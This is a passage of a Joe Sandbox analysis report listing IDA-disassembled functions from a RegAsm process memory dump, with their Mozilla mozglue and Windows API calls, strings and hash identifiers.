                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C726073
                                                                                    • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C726082
                                                                                    • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C74148E), ref: 6C726091
                                                                                    • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,Qll,00000000,?), ref: 6C7260BA
                                                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7260C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                                    • String ID: Qll
                                                                                    • API String ID: 3835517998-3645837480
                                                                                    • Opcode ID: 0cbae3132ad83a16c64c5f0780f7261416b2ec308f1e46155a70be2c4aac9f58
                                                                                    • Instruction ID: 345247eab794ba21ebb6cd866fc9695f7a50e6e5cdcb6b08ca618d46333d0407
                                                                                    • Opcode Fuzzy Hash: 0cbae3132ad83a16c64c5f0780f7261416b2ec308f1e46155a70be2c4aac9f58
                                                                                    • Instruction Fuzzy Hash: AD21A371A002189FDB206F24DC09AAE7BB8FF45218F00C43AE85A97641DB75AA59CFD5
                                                                                    APIs
                                                                                      • Part of subcall function 6C6CEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6CEB83
                                                                                    • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C70B392,?,?,00000001), ref: 6C7091F4
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                    • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                    • API String ID: 3790164461-3347204862
                                                                                    • Opcode ID: dd2870b5e692835c3f67338620ee1e9cd91cf0529d5b081b5bd7e0c92da64285
                                                                                    • Instruction ID: b770194d89491931d3c1e719a00e4aa25656100ba99146c278ec9577f4e29249
                                                                                    • Opcode Fuzzy Hash: dd2870b5e692835c3f67338620ee1e9cd91cf0529d5b081b5bd7e0c92da64285
                                                                                    • Instruction Fuzzy Hash: C4B1C1B0B012099BDB04CFA4CA567EEBBB6EF95318F108029D405ABF81D771E945CBD5
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6EC5A3
                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6C6EC9EA
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C6EC9FB
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C6ECA12
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6ECA2E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ECAA5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                    • String ID: (null)$0
                                                                                    • API String ID: 4074790623-38302674
                                                                                    • Opcode ID: ab20a03f8345a0b584e37b351d5155c6e2858e7d4914b854f72fe0141d46a829
                                                                                    • Instruction ID: 2b18056ce524f9fc3b5a4cb4e81fbd4fc2ea4408c0642f9e9974291a89270d58
                                                                                    • Opcode Fuzzy Hash: ab20a03f8345a0b584e37b351d5155c6e2858e7d4914b854f72fe0141d46a829
                                                                                    • Instruction Fuzzy Hash: 29A18D3060E341AFDB10EF28C55475BBBE1BFCA748F04892EE99A97641D731D809CB96
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C70483A,?), ref: 6C6C4ACB
                                                                                    • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C70483A,?), ref: 6C6C4AE0
                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C70483A,?), ref: 6C6C4A82
                                                                                      • Part of subcall function 6C6DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C6DCAA2
                                                                                    • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C70483A,?), ref: 6C6C4A97
                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C70483A,?), ref: 6C6C4A35
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C70483A,?), ref: 6C6C4A4A
                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C70483A,?), ref: 6C6C4AF4
                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C70483A,?), ref: 6C6C4B10
                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C70483A,?), ref: 6C6C4B2C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                                    • String ID: :Hpl
                                                                                    • API String ID: 4251373892-2875215652
                                                                                    • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                    • Instruction ID: 58cb4c0a4a0a08bb7b37d0dd3a526cf656570b624e11f69bc60b312216d64fc4
                                                                                    • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                    • Instruction Fuzzy Hash: DD7147B1A006069FCB54CF68C480ABAB7F5FF09308B10467EE15A9BB41E771F655CB85
                                                                                    APIs
                                                                                    • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6EC784
                                                                                    • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6EC801
                                                                                    • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C6EC83D
                                                                                    • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6EC891
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                                    • String ID: INF$NAN$inf$nan
                                                                                    • API String ID: 1991403756-4166689840
                                                                                    • Opcode ID: b8bd7569a96bf17ff5deb9ba011d39e644ca89a5cf89e57734a29520ccbaa2d5
                                                                                    • Instruction ID: 139688366a6d978f4b2f3170f3c5e0da4dad785cdd4ac947a598269fd761c3ce
                                                                                    • Opcode Fuzzy Hash: b8bd7569a96bf17ff5deb9ba011d39e644ca89a5cf89e57734a29520ccbaa2d5
                                                                                    • Instruction Fuzzy Hash: 34517070A0D7409BD704AF68C58169BFBF0BF9E309F008A2EE9D597650E770D9898B47
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6C3492
                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6C34A9
                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6C34EF
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C6C350E
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6C3522
                                                                                    • __aulldiv.LIBCMT ref: 6C6C3552
                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6C357C
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6C3592
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                    • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                    • API String ID: 3634367004-706389432
                                                                                    • Opcode ID: 54420746f5763a12cf10f34f0df22617d56311920d2d329b3862e820b3b2643b
                                                                                    • Instruction ID: 952a426a459e05823fcc4c3347c23e1ef4643409fa7fd8b0d041ac2f46b6e97e
                                                                                    • Opcode Fuzzy Hash: 54420746f5763a12cf10f34f0df22617d56311920d2d329b3862e820b3b2643b
                                                                                    • Instruction Fuzzy Hash: EB31B371B002499BDF00EFB9C948EEE77B9FB86309F50803AE515A3650DB70A905CB66
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$moz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3009372454-0
                                                                                    • Opcode ID: c460ce785199cab6adb93dbdd1c0e3dbbe5e313bd10e2dc493b5aa9849339720
                                                                                    • Instruction ID: cf682b1f15835d46b6035c11172d932af4b4838bf0ff15cb5a925ea8c3810931
                                                                                    • Opcode Fuzzy Hash: c460ce785199cab6adb93dbdd1c0e3dbbe5e313bd10e2dc493b5aa9849339720
                                                                                    • Instruction Fuzzy Hash: 52B1E371B051108FDB18DE2CC8D47BD76B2EF46328F184669E816DBBC6D7B1D8408B9A
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                    • String ID:
                                                                                    • API String ID: 1192971331-0
                                                                                    • Opcode ID: 2ac825dd7206904f13d24a646b48438a904ce64cfbaf3912eb3eeacbbc99f349
                                                                                    • Instruction ID: e734c636354958532650523792c541a66bc941e839155362811692ecaeeafdc7
                                                                                    • Opcode Fuzzy Hash: 2ac825dd7206904f13d24a646b48438a904ce64cfbaf3912eb3eeacbbc99f349
                                                                                    • Instruction Fuzzy Hash: 073162B1904B048FDB00BF7CD64966EBBF4BF85315F01893DE99987215EB74A848CB82
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C6D9675
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D9697
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6D96E8
                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C6D9707
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D971F
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6D9773
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6D97B7
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D97D0
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D97EB
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6D9824
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                    • API String ID: 409848716-3880535382
                                                                                    • Opcode ID: 6596f8f5aab6d34fde6658bc7fe980a91291b5cbead54da609cbdc3019298766
                                                                                    • Instruction ID: e7171e580d4be88597d618c0dfefe948edcade72ee7936de2077d6e5a45bed2d
                                                                                    • Opcode Fuzzy Hash: 6596f8f5aab6d34fde6658bc7fe980a91291b5cbead54da609cbdc3019298766
                                                                                    • Instruction Fuzzy Hash: B04100707006059BDF00EFB4DA94A9A7BB5EB4A32CF41813AED1587740DB34B904CBA4
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C710039
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C710041
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C710075
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C710082
                                                                                    • moz_xmalloc.MOZGLUE(00000048), ref: 6C710090
                                                                                    • free.MOZGLUE(?), ref: 6C710104
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C71011B
                                                                                    Strings
                                                                                    • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C71005B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                                    • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                                    • API String ID: 3012294017-637075127
                                                                                    • Opcode ID: 3aec143e8585752566c02389d0d3da096ead71c666ff145ebff144321c0230ea
                                                                                    • Instruction ID: 6442c1a49de802e032e3a3d1900dc508b93d55a0f1aa6a1a5c5a6b628e768c9f
                                                                                    • Opcode Fuzzy Hash: 3aec143e8585752566c02389d0d3da096ead71c666ff145ebff144321c0230ea
                                                                                    • Instruction Fuzzy Hash: 4641CDB5600744DFCB10DF68C944A9ABBF1FF4A328F44852EE96A83B40DB31B815CB95
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6D7EA7
                                                                                    • malloc.MOZGLUE(00000001), ref: 6C6D7EB3
                                                                                      • Part of subcall function 6C6DCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C6DCB49
                                                                                      • Part of subcall function 6C6DCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C6DCBB6
                                                                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C6D7EC4
                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6C6D7F19
                                                                                    • malloc.MOZGLUE(?), ref: 6C6D7F36
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6D7F4D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                    • String ID: d
                                                                                    • API String ID: 204725295-2564639436
                                                                                    • Opcode ID: fbf11bb9527e4e8bb47a22cac0c1a7e1a93085dff8a9524c250cf349dda5609c
                                                                                    • Instruction ID: 7b7717cd23c942647b34ef43fac8c590323c3dcb6fe2e62d8070c9f8a5e24b5b
                                                                                    • Opcode Fuzzy Hash: fbf11bb9527e4e8bb47a22cac0c1a7e1a93085dff8a9524c250cf349dda5609c
                                                                                    • Instruction Fuzzy Hash: 1E310561E0025C97DB00AB68CC049FEB778EF96318F059629ED499B612FB30A588C399
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL ref: 6C6D3EEE
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6D3FDC
                                                                                    • RtlAllocateHeap.NTDLL ref: 6C6D4006
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6D40A1
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C6D3CCC), ref: 6C6D40AF
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C6D3CCC), ref: 6C6D40C2
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6D4134
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C6D3CCC), ref: 6C6D4143
                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C6D3CCC), ref: 6C6D4157
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$Heap$StringUnicode$Allocate
                                                                                    • String ID:
                                                                                    • API String ID: 3680524765-0
                                                                                    • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                    • Instruction ID: 6a009c823b33986a8875344f284922f215ddb7b44970e7852167a58793937b56
                                                                                    • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                    • Instruction Fuzzy Hash: 1BA18FB1A00215CFDB40CF28C880769B7B5FF48308F2A41A9D909AF742D771EC86CBA4
                                                                                    APIs
                                                                                    • memcpy.VCRUNTIME140(00000000,?,6C6E3F47,?,?,?,6C6E3F47,6C6E1A70,?), ref: 6C6C207F
                                                                                    • memset.VCRUNTIME140(?,000000E5,6C6E3F47,?,6C6E3F47,6C6E1A70,?), ref: 6C6C20DD
                                                                                    • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C6E3F47,6C6E1A70,?), ref: 6C6C211A
                                                                                    • EnterCriticalSection.KERNEL32(6C74E744,?,6C6E3F47,6C6E1A70,?), ref: 6C6C2145
                                                                                    • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C6E3F47,6C6E1A70,?), ref: 6C6C21BA
                                                                                    • EnterCriticalSection.KERNEL32(6C74E744,?,6C6E3F47,6C6E1A70,?), ref: 6C6C21E0
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E744,?,6C6E3F47,6C6E1A70,?), ref: 6C6C2232
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                                    • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                    • API String ID: 889484744-884734703
                                                                                    • Opcode ID: 5eb1fa176b39f2136949b9e7a9165c0df1b2abdac38eb836e7762ee38a02ef3e
                                                                                    • Instruction ID: 576cf74588c87ed7058a760be095489e3955ef4b72d58c16169f8715ca2aaefc
                                                                                    • Opcode Fuzzy Hash: 5eb1fa176b39f2136949b9e7a9165c0df1b2abdac38eb836e7762ee38a02ef3e
                                                                                    • Instruction Fuzzy Hash: 8761F931F042158FCB04DE78C989B6E77B5EF85328F158136EA24A7B94D7709D00C78A
                                                                                    APIs
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C718273), ref: 6C719D65
                                                                                    • free.MOZGLUE(6C718273,?), ref: 6C719D7C
                                                                                    • free.MOZGLUE(?,?), ref: 6C719D92
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C719E0F
                                                                                    • free.MOZGLUE(6C71946B,?,?), ref: 6C719E24
                                                                                    • free.MOZGLUE(?,?,?), ref: 6C719E3A
